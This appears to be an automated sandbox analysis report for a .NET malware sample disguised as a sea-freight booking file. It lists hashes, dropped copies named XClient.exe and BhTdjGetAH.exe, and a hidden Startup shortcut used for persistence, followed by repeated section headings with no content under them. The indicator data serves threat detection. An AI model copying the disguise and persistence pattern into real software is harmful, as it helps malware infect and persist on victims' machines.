Source: Yara match	File source: Process Memory Space: BhTdjGetAH.exe PID: 7996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 2132, type: MEMORYSTR

ID:	1466424
Product:	CloudBasic
Start time:	22:31:09
Start date:	02.07.2024
Sample:	FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	18907f90316aa47034081363dc00f908
SHA1:	49b3c6c35c08c824ffb67f3dbcc1b215842a7014
SHA256:	d384ba14fe02622e460cd9805eb86a45b6c4f9e787ecdc015bc6034e69410e3d
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BhTdjGetAH.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XClient.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	606D32F377AD35DA05BE0F6988F0F25A	B440DEB8F5AC74255820CB26C37469156565AA7E	8177E4D50280ECD8330FA9AD9E41176574FD455AD476705689955D5D4488F6E4
C:\Users\user\AppData\Local\Temp\Log.tmp	ASCII text, with CRLF line terminators	0DB526D48DAB0E640663E4DC0EFE82BA	17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724	934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05rkeint.eww.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k3h4b40.2ii.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_42cakj3r.j5p.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvx0z5a0.vuc.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmpueysj.t3c.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g2py01up.kow.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h04lvzop.whv.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdj1mpcu.qlj.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hekmxnry.tv5.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipezphyi.uvv.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzzxvptr.0s0.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2ehbdei.3dt.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1vw4y2q.ccb.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnncyxbn.blk.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpmwiqf5.g0e.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2uoltdj.4s4.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t10loqb1.1su.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkufpj2r.epl.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tuek0iwo.iba.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbktwajr.uyr.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyi3t2nd.cqd.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5ag45ok.nft.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysrpx5lg.alv.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zaqmp0xi.rw5.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\tmp125.tmp	XML 1.0 document, ASCII text	C63D8C24EE20AA2AFE44B50D793FF6DC	B4BEC122A383BCCE3CE53988D028B773733FBD4A	B6CAF272219BDCE40A2D88E9063819E35C8717BF94E5D005EFB8282A641D628F
C:\Users\user\AppData\Local\Temp\tmp378C.tmp	XML 1.0 document, ASCII text	C63D8C24EE20AA2AFE44B50D793FF6DC	B4BEC122A383BCCE3CE53988D028B773733FBD4A	B6CAF272219BDCE40A2D88E9063819E35C8717BF94E5D005EFB8282A641D628F
C:\Users\user\AppData\Local\Temp\tmp5296.tmp	XML 1.0 document, ASCII text	C63D8C24EE20AA2AFE44B50D793FF6DC	B4BEC122A383BCCE3CE53988D028B773733FBD4A	B6CAF272219BDCE40A2D88E9063819E35C8717BF94E5D005EFB8282A641D628F
C:\Users\user\AppData\Local\Temp\tmpDDBF.tmp	XML 1.0 document, ASCII text	C63D8C24EE20AA2AFE44B50D793FF6DC	B4BEC122A383BCCE3CE53988D028B773733FBD4A	B6CAF272219BDCE40A2D88E9063819E35C8717BF94E5D005EFB8282A641D628F
C:\Users\user\AppData\Local\XClient.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	18907F90316AA47034081363DC00F908	49B3C6C35C08C824FFB67F3DBCC1B215842A7014	D384BA14FE02622E460CD9805EB86A45B6C4F9E787ECDC015BC6034E69410E3D
C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	18907F90316AA47034081363DC00F908	49B3C6C35C08C824FFB67F3DBCC1B215842A7014	D384BA14FE02622E460CD9805EB86A45B6C4F9E787ECDC015BC6034E69410E3D
C:\Users\user\AppData\Roaming\BhTdjGetAH.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jul 2 19:32:36 2024, mtime=Tue Jul 2 19:32:36 2024, atime=Tue Jul 2 19:32:36 2024, length=525312, window=hide	050303E307C9BF9EA09818D35949FDDD	D2C4F7E5020612C759D99EAB6587E003F3A0CABE	0D40D10DDDD9C45457567F4B7759354B229A8B2D0F26EB685BDEC8037C834262

Windows Analysis Report
FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Malware Threat Intel
Provided by